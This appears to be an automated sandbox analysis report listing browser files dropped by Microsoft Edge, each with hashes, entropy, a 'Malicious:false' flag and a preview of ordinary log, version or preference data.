                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.217609085124426
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHiCQ+q2P923oH+TcwtfrK+IFUt8YHFCgZmw+YHFCQVkwO923oH+TcwtfrUeLJ:niev4Yeb23FUt8kZ/+kz5LYeb3J
                                                                                                                                                                                                                                                        MD5:4793DD82B5EE25F4860B06D9390297D4
                                                                                                                                                                                                                                                        SHA1:BD7F2D39E2CF7005AF83CBD38E2B00BF38DB1E15
                                                                                                                                                                                                                                                        SHA-256:A9D43A02D8421D9767FBA520E5D79AB10334174324A10467CF912F606EAE9E55
                                                                                                                                                                                                                                                        SHA-512:3696D5142C8C9FA4147FF91360DFCFC78956CD2DBE397941DE1E316DA6FD655D2708E672773A32E9F129F3FB6BFD63BFFDE2A47EA6179EE4D51F71CDE05E8460
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.907 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/20-18:49:27.908 1df8 Recovering log #3.2024/11/20-18:49:27.908 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):787
                                                                                                                                                                                                                                                        Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                        MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                        SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                        SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                        SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):342
                                                                                                                                                                                                                                                        Entropy (8bit):5.2245042995340905
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHUBSQ+q2P923oH+TcwtfrzAdIFUt8YHYuCgZmw+YHCCQVkwO923oH+TcwtfrzId:nUBOv4Yeb9FUt8kJn/+k05LYeb2J
                                                                                                                                                                                                                                                        MD5:81F2F4C957093683241F2FBA5454F486
                                                                                                                                                                                                                                                        SHA1:837E5E47CA78067B340040273AFC44C164A323D0
                                                                                                                                                                                                                                                        SHA-256:948EE0DD816DC199D465038BB9AAA28313D3A78F8BF34B1C6A7C726B0460ED0B
                                                                                                                                                                                                                                                        SHA-512:E5B0369C94601CC5C7F3400E1381283323E6886FFE61B919702BC5A85C20E65EA686361D537E4EE9E892D58B275649AC8E4BE8F9C26B05F1679E48BED5754C4D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.884 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/20-18:49:27.885 1df8 Recovering log #3.2024/11/20-18:49:27.886 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):342
                                                                                                                                                                                                                                                        Entropy (8bit):5.2245042995340905
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHUBSQ+q2P923oH+TcwtfrzAdIFUt8YHYuCgZmw+YHCCQVkwO923oH+TcwtfrzId:nUBOv4Yeb9FUt8kJn/+k05LYeb2J
                                                                                                                                                                                                                                                        MD5:81F2F4C957093683241F2FBA5454F486
                                                                                                                                                                                                                                                        SHA1:837E5E47CA78067B340040273AFC44C164A323D0
                                                                                                                                                                                                                                                        SHA-256:948EE0DD816DC199D465038BB9AAA28313D3A78F8BF34B1C6A7C726B0460ED0B
                                                                                                                                                                                                                                                        SHA-512:E5B0369C94601CC5C7F3400E1381283323E6886FFE61B919702BC5A85C20E65EA686361D537E4EE9E892D58B275649AC8E4BE8F9C26B05F1679E48BED5754C4D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.884 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/20-18:49:27.885 1df8 Recovering log #3.2024/11/20-18:49:27.886 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:117.0.2045.47
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
                                                                                                                                                                                                                                                        SHA-512:92C29CF93645A0CA3215433842AEC5BB5AD283C2E01249AFE553ACCC622E8EF849BBB04FAF0DCEEFC9A5DC147740F6C3A0F64FF21ECFC498A49843D48801678C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                        Entropy (8bit):6.090739494434723
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMAwuF9hDO6vP6O+Ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEG6etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                        MD5:823CC343BCB387C66444B294D8B91769
                                                                                                                                                                                                                                                        SHA1:79706212495F37F90FF98C21F22A2AD9A3F57FA2
                                                                                                                                                                                                                                                        SHA-256:16624A2E1AF4290D85FF7D022AEC0DBCB7DBD0BA61E2355FB29990D2156F2490
